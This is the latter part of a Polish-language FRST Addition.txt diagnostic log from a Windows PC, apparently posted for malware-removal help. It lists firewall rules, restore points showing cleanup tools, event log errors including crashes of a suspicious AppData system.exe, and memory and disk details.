Files\HP\HP Deskjet 6520 series\Bin\DeviceSetup.exe FirewallRules: [{4D52E967-1C5B-4348-B9D1-DB9C7F943549}] => (Allow) C:\Program Files\HP\HP Deskjet 6520 series\Bin\HPNetworkCommunicator.exe FirewallRules: [{5EE29DB6-EFB1-432E-A212-A56FD374C011}] => (Allow) C:\Program Files\HP\HP Deskjet 6520 series\Bin\HPNetworkCommunicatorCom.exe FirewallRules: [{35474424-CA5B-4176-9731-79C9E6C7033F}] => (Allow) C:\LJP1100_P1560_P1600_Full_Solution\ProductInst64.exe FirewallRules: [{435A4F62-AC28-466F-9D2A-A3A0C7015008}] => (Allow) C:\LJP1100_P1560_P1600_Full_Solution\ProductInst64.exe FirewallRules: [{D7D0815A-FD7D-4CAD-88D1-7A92D3420DF6}] => (Allow) LPort=9100 FirewallRules: [{2434A5BE-BFD4-4E6E-B1B6-2B1FF07DF34D}] => (Allow) LPort=427 FirewallRules: [{EB7B30C7-327A-40E3-9E5C-8737EA781042}] => (Allow) LPort=161 FirewallRules: [{072AD6C9-7876-4CEC-891F-4DFFBC2EEA8B}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe FirewallRules: [{767857BE-7A5E-4A16-AB3A-629D71BCCFD4}] => (Allow) C:\Windows\system32\rundll32.exe FirewallRules: [{AE367ABE-F320-473A-BA49-04E37FBB5333}] => (Allow) C:\Windows\System32\rundll32.exe FirewallRules: [{D55EE813-2220-440F-A496-09869880EC52}] => (Allow) C:\Windows\System32\rundll32.exe FirewallRules: [{0C072913-9A87-4AAD-9C53-7690CD5DC801}] => (Allow) C:\Windows\System32\rundll32.exe FirewallRules: [{ABAE7743-C427-4CF5-8F57-475F8C7BCCEE}] => (Allow) C:\Windows\System32\rundll32.exe ==================== Punkty Przywracania systemu ========================= 20-04-2017 10:18:55 Zaplanowany punkt kontrolny 04-05-2017 09:30:57 Zaplanowany punkt kontrolny 10-05-2017 12:16:55 Usunięto: A2C 10-05-2017 12:57:04 Avira PC Cleaner - 2017-05-10 12:57 10-05-2017 14:52:18 Avira PC Cleaner - 2017-05-10 14:52 10-05-2017 15:18:59 Removed Belkin 54Mbps Wireless Network Adapter 10-05-2017 15:19:43 Removed Icushclotusy 10-05-2017 15:29:11 F-Secure malware removal 10-05-2017 15:43:15 Installed Microsoft Solution - B4164D8C-3813-495A-BBBC-BA51D122A226 10-05-2017 15:43:30 Punkt przywracania przed Uszkodzone klucze rejestru poprawki ==================== Wadliwe urządzenia w Menedżerze urządzeń ============= ==================== Błędy w Dzienniku zdarzeń: ========================= Dziennik Aplikacja: ================== Error: (05/12/2017 10:36:23 AM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: ) Description: Event-ID 0 Error: (05/12/2017 10:26:31 AM) (Source: WinMgmt) (EventID: 10) (User: ) Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected. Error: (05/10/2017 03:34:07 PM) (Source: WinMgmt) (EventID: 10) (User: ) Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected. Error: (05/10/2017 03:06:47 PM) (Source: WinMgmt) (EventID: 10) (User: ) Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected. Error: (05/10/2017 11:56:07 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nazwa aplikacji powodującej błąd: system.exe, wersja: 0.0.0.0, sygnatura czasowa: 0x58e9a4a0 Nazwa modułu powodującego błąd: system.exe, wersja: 0.0.0.0, sygnatura czasowa: 0x58e9a4a0 Kod wyjątku: 0xc0000005 Przesunięcie błędu: 0x0000d915 Identyfikator procesu powodującego błąd: 0xc3c Godzina uruchomienia aplikacji powodującej błąd: 0x01d2c97393404717 Ścieżka aplikacji powodującej błąd: C:\Users\And\AppData\Local\system.exe Ścieżka modułu powodującego błąd: C:\Users\And\AppData\Local\system.exe Identyfikator raportu: e284a48e-3566-11e7-bd35-0023ae83f545 Error: (05/10/2017 11:55:38 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nazwa aplikacji powodującej błąd: system.exe, wersja: 0.0.0.0, sygnatura czasowa: 0x58e9a4a0 Nazwa modułu powodującego błąd: system.exe, wersja: 0.0.0.0, sygnatura czasowa: 0x58e9a4a0 Kod wyjątku: 0xc0000005 Przesunięcie błędu: 0x0000d915 Identyfikator procesu powodującego błąd: 0xdcc Godzina uruchomienia aplikacji powodującej błąd: 0x01d2c97393404717 Ścieżka aplikacji powodującej błąd: C:\Users\And\AppData\Local\system.exe Ścieżka modułu powodującego błąd: C:\Users\And\AppData\Local\system.exe Identyfikator raportu: d15f1404-3566-11e7-bd35-0023ae83f545 Error: (05/10/2017 11:53:48 AM) (Source: WinMgmt) (EventID: 10) (User: ) Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected. Error: (05/10/2017 12:40:53 AM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: ) Description: Event-ID 0 Error: (05/09/2017 03:51:54 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nazwa aplikacji powodującej błąd: thunderbird.exe, wersja: 45.8.0.6273, sygnatura czasowa: 0x58bc9206 Nazwa modułu powodującego błąd: unknown, wersja: 0.0.0.0, sygnatura czasowa: 0x00000000 Kod wyjątku: 0xc0000005 Przesunięcie błędu: 0x2613fa4c Identyfikator procesu powodującego błąd: 0x1080 Godzina uruchomienia aplikacji powodującej błąd: 0x01d2c89985a77189 Ścieżka aplikacji powodującej błąd: C:\Program Files (x86)\Mozilla Thunderbird\thunderbird.exe Ścieżka modułu powodującego błąd: unknown Identyfikator raportu: a89b30ae-34be-11e7-97c1-0023ae83f545 Error: (05/09/2017 01:17:01 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nazwa aplikacji powodującej błąd: plugin-container.exe, wersja: 53.0.2.6333, sygnatura czasowa: 0x590bd295 Nazwa modułu powodującego błąd: xul.dll, wersja: 53.0.2.6333, sygnatura czasowa: 0x590bd27e Kod wyjątku: 0x80000003 Przesunięcie błędu: 0x0089d467 Identyfikator procesu powodującego błąd: 0x157c Godzina uruchomienia aplikacji powodującej błąd: 0x01d2c8af7df572c7 Ścieżka aplikacji powodującej błąd: C:\Program Files (x86)\Mozilla Firefox\plugin-container.exe Ścieżka modułu powodującego błąd: C:\Program Files (x86)\Mozilla Firefox\xul.dll Identyfikator raportu: 05b3ebd7-34a9-11e7-97c1-0023ae83f545 Dziennik System: ============= Error: (05/12/2017 10:27:27 AM) (Source: DCOM) (EventID: 10016) (User: ZARZĄDZANIE NT) Description: Zgodnie z ustawieniami uprawnienia właściwe dla aplikacji nie jest udzielane uprawnienie Lokalny Uruchom do aplikacji serwera COM z identyfikatorem klasy CLSID {C97FCC79-E628-407D-AE68-A06AD6D8B4D1} i identyfikatorem aplikacji APPID {344ED43D-D086-4961-86A6-1106F4ACAD9B} użytkownikowi ZARZĄDZANIE NT\SYSTEM o identyfikatorze zabezpieczeń SID (S-1-5-18) z adresu LocalHost (użycie LRPC). To uprawnienie zabezpieczeń można modyfikować przy użyciu narzędzia administracyjnego Usługi składowe. Error: (05/12/2017 10:26:26 AM) (Source: Service Control Manager) (EventID: 7023) (User: ) Description: Usługa WinSAPSvc zakończyła działanie; wystąpił następujący błąd: Nie można odnaleźć określonego modułu. Error: (05/12/2017 10:26:25 AM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Nie można uruchomić usługi Recover z powodu następującego błędu: Nie można odnaleźć określonego pliku. Error: (05/12/2017 10:26:20 AM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Nie można uruchomić usługi DgiVecp z powodu następującego błędu: Nie można odnaleźć określonego pliku. Error: (05/10/2017 03:34:59 PM) (Source: DCOM) (EventID: 10016) (User: ZARZĄDZANIE NT) Description: Zgodnie z ustawieniami uprawnienia właściwe dla aplikacji nie jest udzielane uprawnienie Lokalny Uruchom do aplikacji serwera COM z identyfikatorem klasy CLSID {C97FCC79-E628-407D-AE68-A06AD6D8B4D1} i identyfikatorem aplikacji APPID {344ED43D-D086-4961-86A6-1106F4ACAD9B} użytkownikowi ZARZĄDZANIE NT\SYSTEM o identyfikatorze zabezpieczeń SID (S-1-5-18) z adresu LocalHost (użycie LRPC). To uprawnienie zabezpieczeń można modyfikować przy użyciu narzędzia administracyjnego Usługi składowe. Error: (05/10/2017 03:33:59 PM) (Source: Service Control Manager) (EventID: 7023) (User: ) Description: Usługa WinSAPSvc zakończyła działanie; wystąpił następujący błąd: Nie można odnaleźć określonego modułu. Error: (05/10/2017 03:33:57 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Nie można uruchomić usługi Recover z powodu następującego błędu: Nie można odnaleźć określonego pliku. Error: (05/10/2017 03:33:51 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Nie można uruchomić usługi DgiVecp z powodu następującego błędu: Nie można odnaleźć określonego pliku. Error: (05/10/2017 03:07:39 PM) (Source: DCOM) (EventID: 10016) (User: ZARZĄDZANIE NT) Description: Zgodnie z ustawieniami uprawnienia właściwe dla aplikacji nie jest udzielane uprawnienie Lokalny Uruchom do aplikacji serwera COM z identyfikatorem klasy CLSID {C97FCC79-E628-407D-AE68-A06AD6D8B4D1} i identyfikatorem aplikacji APPID {344ED43D-D086-4961-86A6-1106F4ACAD9B} użytkownikowi ZARZĄDZANIE NT\SYSTEM o identyfikatorze zabezpieczeń SID (S-1-5-18) z adresu LocalHost (użycie LRPC). To uprawnienie zabezpieczeń można modyfikować przy użyciu narzędzia administracyjnego Usługi składowe. Error: (05/10/2017 03:06:43 PM) (Source: Service Control Manager) (EventID: 7023) (User: ) Description: Usługa WinSAPSvc zakończyła działanie; wystąpił następujący błąd: Nie można odnaleźć określonego modułu. ==================== Statystyki pamięci =========================== Procesor: Intel(R) Xeon(R) CPU E5410 @ 2.33GHz Procent pamięci w użyciu: 50% Całkowita pamięć fizyczna: 4093.65 MB Dostępna pamięć fizyczna: 2026.31 MB Całkowita pamięć wirtualna: 8185.5 MB Dostępna pamięć wirtualna: 5752.98 MB ==================== Dyski ================================ Drive c: () (Fixed) (Total:297.99 GB) (Free:209.78 GB) NTFS ==================== MBR & Tablica partycji ================== ======================================================== Disk: 0 (MBR Code: Windows 7 or 8) (Size: 298.1 GB) (Disk ID: F9275857) Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS) Partition 2: (Not Active) - (Size=298 GB) - (Type=07 NTFS) ==================== Koniec Addition.txt ============================